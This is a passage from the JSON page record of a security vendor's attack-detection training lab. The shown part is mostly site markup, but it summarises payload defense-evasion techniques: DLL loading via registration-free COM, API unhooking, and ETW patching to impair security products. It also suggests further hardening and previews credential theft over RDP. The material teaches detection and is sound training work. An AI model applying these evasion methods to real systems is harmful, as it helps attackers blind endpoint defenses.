DLLs to %APPDATA%?!).<\/li>\n<li>Loading of our DLL using Registration Free COM.<\/li>\n<li>API unhooking to bypass any userland hooks that might interfere with our execution.<\/li>\n<li>ETW patching using environment variables to impair security products that rely on ETW for functionality.<\/li>\n<\/ul>\n<p>There are many improvements that can be done to further harden our payload, but that is left as an exercise for the reader. Examples of things that could and should be implemented:<\/p>\n<ul>\n<li>Encryption for strings.<\/li>\n<li>Sandbox detection.<\/li>\n<li>Execution guardrails for limiting the scope of our payload.<\/li>\n<\/ul>\n<p>Join us for the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-3\/\" target=\"_blank\" rel=\"noopener\">next lab<\/a> where we take the principle of API hooking and apply it in an offensive context; hooking functions as a user authenticates over RDP to retrieve their plaintext credentials!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/darkgate-rises\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/reverse-engineering-a-lumma-infection\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/machine-learning-driven-malware-analysis\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this lab, we&#8217;ll continue to refine our payload, introducing other defense evasion techniques to unhook potentially EDR-monitored API functions, and patch ETW to ensure our subsequent activities aren&#8217;t seen by security tools that rely on this telemetry source for their detections.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[314,332,315],"labs_content_type":[317],"class_list":["post-10523","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-endpoint-security","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: Windows &#8211; Lab #2<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this lab, we&#039;ll continue to refine our payload, introducing other defense evasion techniques to unhook potentially EDR-monitored API functions, and patch ETW to ensure our subsequent activities aren&#039;t seen by security tools that rely on this telemetry source for their detections.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item\/10523","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/media?parent=10523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/categories?post=10523"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/labs_content_type?post=10523"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}